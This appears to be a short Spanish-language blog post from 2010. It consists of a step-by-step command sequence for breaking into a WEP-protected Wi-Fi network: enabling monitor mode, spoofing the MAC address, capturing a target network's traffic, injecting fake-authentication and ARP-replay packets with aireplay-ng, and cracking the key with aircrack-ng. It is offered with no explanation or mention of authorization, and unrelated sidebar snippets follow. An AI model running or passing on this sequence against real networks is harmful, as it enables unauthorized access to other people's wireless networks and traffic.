apt-get update
sudo apt-get install aircrack-ng
apt-get install macchanger
airmon-ng start wlan0
sudo ifconfig mon0 down
sudo macchanger -m 00:11:22:33:44:55 mon0
sudo ifconfig mon0 up
sudo airodump-ng mon0
control – c
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
TERMINAL 2
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
TERMINAL 3
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
Le decimos que si (y) y le damos enter
TERMINAL 4
sudo aircrack-ng -z [nombre red]*.cap
jueves, 18 de marzo de 2010
Suscribirse a:
Enviar comentarios (Atom)
Instalar systemd y systemd-sysv
Instalar systemd y s ystemd-sysv Debian $apt-get update $apt-get upgrade $apt-get install systemd $apt-get install systemd-sysv Este...
-
wget -O - --http-user=username --http-passwd=password 'http://dynamic.zoneedit.com/auth/dynamic.html?host=www.mydomain.com'
-
# 1: Detener el proceso del servidor MySQL. root@servidor-ubuntu:~# /etc/init.d/mysql stop * Stopping MySQL database server mysqld [ OK ] ro...
-
auto lo iface lo inet loopback auto eth0 #real IP adress iface eth0 inet static address 192.168.1.252 netmask 255.2...
No hay comentarios:
Publicar un comentario